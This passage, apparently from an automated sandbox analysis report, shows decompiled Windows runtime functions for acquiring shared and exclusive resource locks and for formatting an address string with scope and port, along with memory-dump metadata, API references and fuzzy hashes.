				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00d301c0;
									_push(_t144);
									_push(0);
									_t51 = E00C4F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00C94FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00CA3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00CA3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00CD217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00CA3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00C93915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00d301c0;
												_push(_t138);
												_push(0);
												_t58 = E00C4F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00C94FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00CA3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00CA3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00CD217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00CA3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00C93915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00C75384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00C4F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00C93915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00C4F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00C93915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00C4F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00C93915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00C75329(_t110, _t138);
																_t69 = E00C753A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                  0x00c9055a
                                                                                                                                                  0x00c9055d
                                                                                                                                                  0x00c90563
                                                                                                                                                  0x00c90566
                                                                                                                                                  0x00c905d8
                                                                                                                                                  0x00c905e2
                                                                                                                                                  0x00c905e5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c905e7
                                                                                                                                                  0x00c905e7
                                                                                                                                                  0x00c905ea
                                                                                                                                                  0x00c905f3
                                                                                                                                                  0x00c905f3
                                                                                                                                                  0x00c90568
                                                                                                                                                  0x00c90568
                                                                                                                                                  0x00c90568
                                                                                                                                                  0x00c90569
                                                                                                                                                  0x00c90569
                                                                                                                                                  0x00c90569
                                                                                                                                                  0x00c9056b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb217f
                                                                                                                                                  0x00cb2183
                                                                                                                                                  0x00cb225b
                                                                                                                                                  0x00cb225f
                                                                                                                                                  0x00cb2189
                                                                                                                                                  0x00cb218c
                                                                                                                                                  0x00cb218f
                                                                                                                                                  0x00cb2194
                                                                                                                                                  0x00cb2199
                                                                                                                                                  0x00cb219d
                                                                                                                                                  0x00cb21a0
                                                                                                                                                  0x00cb21a2
                                                                                                                                                  0x00cb21ce
                                                                                                                                                  0x00cb21ce
                                                                                                                                                  0x00cb21ce
                                                                                                                                                  0x00cb21d0
                                                                                                                                                  0x00cb21d6
                                                                                                                                                  0x00cb21de
                                                                                                                                                  0x00cb21e2
                                                                                                                                                  0x00cb21e8
                                                                                                                                                  0x00cb21e9
                                                                                                                                                  0x00cb21ec
                                                                                                                                                  0x00cb21f1
                                                                                                                                                  0x00cb21f6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb21f8
                                                                                                                                                  0x00cb21fb
                                                                                                                                                  0x00cb2206
                                                                                                                                                  0x00cb220b
                                                                                                                                                  0x00cb220c
                                                                                                                                                  0x00cb2217
                                                                                                                                                  0x00cb2226
                                                                                                                                                  0x00cb222b
                                                                                                                                                  0x00cb222c
                                                                                                                                                  0x00cb222f
                                                                                                                                                  0x00cb2232
                                                                                                                                                  0x00cb2235
                                                                                                                                                  0x00cb2235
                                                                                                                                                  0x00cb223a
                                                                                                                                                  0x00cb223f
                                                                                                                                                  0x00cb2241
                                                                                                                                                  0x00cb2243
                                                                                                                                                  0x00cb2248
                                                                                                                                                  0x00cb2248
                                                                                                                                                  0x00cb224d
                                                                                                                                                  0x00cb224f
                                                                                                                                                  0x00cb2262
                                                                                                                                                  0x00cb2263
                                                                                                                                                  0x00cb2268
                                                                                                                                                  0x00cb2269
                                                                                                                                                  0x00cb2269
                                                                                                                                                  0x00cb2269
                                                                                                                                                  0x00cb226d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb2276
                                                                                                                                                  0x00cb2279
                                                                                                                                                  0x00cb227e
                                                                                                                                                  0x00cb2283
                                                                                                                                                  0x00cb2287
                                                                                                                                                  0x00cb228a
                                                                                                                                                  0x00cb228d
                                                                                                                                                  0x00cb228f
                                                                                                                                                  0x00cb22bc
                                                                                                                                                  0x00cb22bc
                                                                                                                                                  0x00cb22bc
                                                                                                                                                  0x00cb22be
                                                                                                                                                  0x00cb22c4
                                                                                                                                                  0x00cb22cc
                                                                                                                                                  0x00cb22d0
                                                                                                                                                  0x00cb22d6
                                                                                                                                                  0x00cb22d7
                                                                                                                                                  0x00cb22da
                                                                                                                                                  0x00cb22df
                                                                                                                                                  0x00cb22e4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb22e6
                                                                                                                                                  0x00cb22e9
                                                                                                                                                  0x00cb22f4
                                                                                                                                                  0x00cb22f9
                                                                                                                                                  0x00cb22fa
                                                                                                                                                  0x00cb2305
                                                                                                                                                  0x00cb2314
                                                                                                                                                  0x00cb2319
                                                                                                                                                  0x00cb231a
                                                                                                                                                  0x00cb231d
                                                                                                                                                  0x00cb2320
                                                                                                                                                  0x00cb2323
                                                                                                                                                  0x00cb2323
                                                                                                                                                  0x00cb2328
                                                                                                                                                  0x00cb232d
                                                                                                                                                  0x00cb232f
                                                                                                                                                  0x00cb2331
                                                                                                                                                  0x00cb2336
                                                                                                                                                  0x00cb2336
                                                                                                                                                  0x00cb233b
                                                                                                                                                  0x00cb233d
                                                                                                                                                  0x00cb2350
                                                                                                                                                  0x00cb2351
                                                                                                                                                  0x00cb2356
                                                                                                                                                  0x00cb2359
                                                                                                                                                  0x00cb2359
                                                                                                                                                  0x00cb235b
                                                                                                                                                  0x00cb235d
                                                                                                                                                  0x00c75367
                                                                                                                                                  0x00c7536b
                                                                                                                                                  0x00c75372
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb2363
                                                                                                                                                  0x00cb2363
                                                                                                                                                  0x00cb2369
                                                                                                                                                  0x00cb236a
                                                                                                                                                  0x00cb236c
                                                                                                                                                  0x00cb2371
                                                                                                                                                  0x00cb2373
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb2379
                                                                                                                                                  0x00cb2379
                                                                                                                                                  0x00cb237a
                                                                                                                                                  0x00cb237f
                                                                                                                                                  0x00cb237f
                                                                                                                                                  0x00cb2385
                                                                                                                                                  0x00cb2386
                                                                                                                                                  0x00cb2389
                                                                                                                                                  0x00cb238e
                                                                                                                                                  0x00cb2390
                                                                                                                                                  0x00c75378
                                                                                                                                                  0x00c7537c
                                                                                                                                                  0x00cb2396
                                                                                                                                                  0x00cb2396
                                                                                                                                                  0x00cb2397
                                                                                                                                                  0x00cb239c
                                                                                                                                                  0x00cb23a2
                                                                                                                                                  0x00cb23a3
                                                                                                                                                  0x00cb23a6
                                                                                                                                                  0x00cb23ab
                                                                                                                                                  0x00cb23ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb23b3
                                                                                                                                                  0x00cb23b3
                                                                                                                                                  0x00cb23b4
                                                                                                                                                  0x00cb23b9
                                                                                                                                                  0x00cb23ba
                                                                                                                                                  0x00cb23ba
                                                                                                                                                  0x00cb23bc
                                                                                                                                                  0x00cb23bf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca9153
                                                                                                                                                  0x00ca9158
                                                                                                                                                  0x00ca915a
                                                                                                                                                  0x00ca915e
                                                                                                                                                  0x00ca9160
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca9166
                                                                                                                                                  0x00ca9166
                                                                                                                                                  0x00ca9171
                                                                                                                                                  0x00ca9176
                                                                                                                                                  0x00ca9176
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca9160
                                                                                                                                                  0x00cb23c6
                                                                                                                                                  0x00cb23ce
                                                                                                                                                  0x00cb23d7
                                                                                                                                                  0x00cb23d7
                                                                                                                                                  0x00cb23ad
                                                                                                                                                  0x00cb2390
                                                                                                                                                  0x00cb2373
                                                                                                                                                  0x00cb233f
                                                                                                                                                  0x00cb233f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb233f
                                                                                                                                                  0x00cb2291
                                                                                                                                                  0x00cb2291
                                                                                                                                                  0x00cb2293
                                                                                                                                                  0x00cb2295
                                                                                                                                                  0x00cb229a
                                                                                                                                                  0x00cb22a1
                                                                                                                                                  0x00cb22a3
                                                                                                                                                  0x00cb22a7
                                                                                                                                                  0x00cb22a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb22ab
                                                                                                                                                  0x00cb22ad
                                                                                                                                                  0x00cb22af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb22af
                                                                                                                                                  0x00cb22b1
                                                                                                                                                  0x00cb22b4
                                                                                                                                                  0x00cb22b4
                                                                                                                                                  0x00cb22b6
                                                                                                                                                  0x00c753be
                                                                                                                                                  0x00c753be
                                                                                                                                                  0x00c753be
                                                                                                                                                  0x00c753c0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c753cb
                                                                                                                                                  0x00c753ce
                                                                                                                                                  0x00c753d0
                                                                                                                                                  0x00c753d4
                                                                                                                                                  0x00c753d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c753d8
                                                                                                                                                  0x00c753e3
                                                                                                                                                  0x00c753ea
                                                                                                                                                  0x00c753ea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c753d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb22b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb228f
                                                                                                                                                  0x00cb2349
                                                                                                                                                  0x00cb234d
                                                                                                                                                  0x00cb2251
                                                                                                                                                  0x00cb2251
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb2251
                                                                                                                                                  0x00cb21a4
                                                                                                                                                  0x00cb21a4
                                                                                                                                                  0x00cb21a6
                                                                                                                                                  0x00cb21a8
                                                                                                                                                  0x00cb21ac
                                                                                                                                                  0x00cb21b6
                                                                                                                                                  0x00cb21b8
                                                                                                                                                  0x00cb21bc
                                                                                                                                                  0x00cb21be
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb21c0
                                                                                                                                                  0x00cb21c2
                                                                                                                                                  0x00cb21c4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb21c4
                                                                                                                                                  0x00cb21c6
                                                                                                                                                  0x00cb21c6
                                                                                                                                                  0x00cb21c8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb21c8
                                                                                                                                                  0x00cb21a2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb2183
                                                                                                                                                  0x00c9057b
                                                                                                                                                  0x00c9057d
                                                                                                                                                  0x00c90581
                                                                                                                                                  0x00c90583
                                                                                                                                                  0x00cb2178
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90589
                                                                                                                                                  0x00c9058f
                                                                                                                                                  0x00c9058f
                                                                                                                                                  0x00c90583
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB2206
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-4236105082
                                                                                                                                                  • Opcode ID: 3bb0a6db4643c2f38385e334a65a7356b863ed329525940fd3805efab516142a
                                                                                                                                                  • Instruction ID: 93ad5486a5b10546661c951a05a95390dddab6609e178dc802c778adb1581c39
                                                                                                                                                  • Opcode Fuzzy Hash: 3bb0a6db4643c2f38385e334a65a7356b863ed329525940fd3805efab516142a
                                                                                                                                                  • Instruction Fuzzy Hash: 32516D357002426FEF14CE58CC82FE633A9AF94725F218269FD64DF285DA31ED828794
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C914C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E00C914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xd32088; // 0x777a2caa
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00C87707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00C913CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00C87707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00C87707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00C52340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00C5E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                  0x00c914c0
                                                                                                                                                  0x00c914cb
                                                                                                                                                  0x00c914d2
                                                                                                                                                  0x00c914d6
                                                                                                                                                  0x00c914da
                                                                                                                                                  0x00c914de
                                                                                                                                                  0x00c914e3
                                                                                                                                                  0x00c9157a
                                                                                                                                                  0x00c9157a
                                                                                                                                                  0x00c914f1
                                                                                                                                                  0x00c914f3
                                                                                                                                                  0x00cbea0f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbea15
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbea15
                                                                                                                                                  0x00c914f9
                                                                                                                                                  0x00c914f9
                                                                                                                                                  0x00c914fe
                                                                                                                                                  0x00c91504
                                                                                                                                                  0x00cbea1a
                                                                                                                                                  0x00cbea1f
                                                                                                                                                  0x00cbea21
                                                                                                                                                  0x00cbea22
                                                                                                                                                  0x00cbea27
                                                                                                                                                  0x00cbea2a
                                                                                                                                                  0x00cbea2a
                                                                                                                                                  0x00c91515
                                                                                                                                                  0x00c91517
                                                                                                                                                  0x00c9156d
                                                                                                                                                  0x00c91572
                                                                                                                                                  0x00c91575
                                                                                                                                                  0x00c91575
                                                                                                                                                  0x00c9151e
                                                                                                                                                  0x00cbea50
                                                                                                                                                  0x00cbea55
                                                                                                                                                  0x00cbea58
                                                                                                                                                  0x00cbea58
                                                                                                                                                  0x00c9152e
                                                                                                                                                  0x00c91531
                                                                                                                                                  0x00c91533
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c91535
                                                                                                                                                  0x00c91541
                                                                                                                                                  0x00c91549
                                                                                                                                                  0x00c91549
                                                                                                                                                  0x00c91533
                                                                                                                                                  0x00c914f3
                                                                                                                                                  0x00c91559

                                                                                                                                                  APIs
                                                                                                                                                  • ___swprintf_l.LIBCMT ref: 00CBEA22
                                                                                                                                                    • Part of subcall function 00C913CB: ___swprintf_l.LIBCMT ref: 00C9146B
                                                                                                                                                    • Part of subcall function 00C913CB: ___swprintf_l.LIBCMT ref: 00C91490
                                                                                                                                                  • ___swprintf_l.LIBCMT ref: 00C9156D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                  • Opcode ID: 84390689a668e2daa45113ea1a600f095559f2c79c024a2fd6b9d4b9def321b2
                                                                                                                                                  • Instruction ID: 0ae09276fd9825d3f8824fccceeaa9ff5834ee35147f89cc031e5abc7612de02
                                                                                                                                                  • Opcode Fuzzy Hash: 84390689a668e2daa45113ea1a600f095559f2c79c024a2fd6b9d4b9def321b2
                                                                                                                                                  • Instruction Fuzzy Hash: E921C37290021A9BCF21EE54CC4AAEF73BCEB50700F5A4161FC56D3141EB70EA589BE1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C753A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                  			E00C753A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00d301c0;
									_push(_t92);
									_push(0);
									_t37 = E00C4F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00C94FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00CA3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00CA3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00CD217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00CA3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00C93915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00C75384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00C4F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00C93915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00C4F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00C93915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
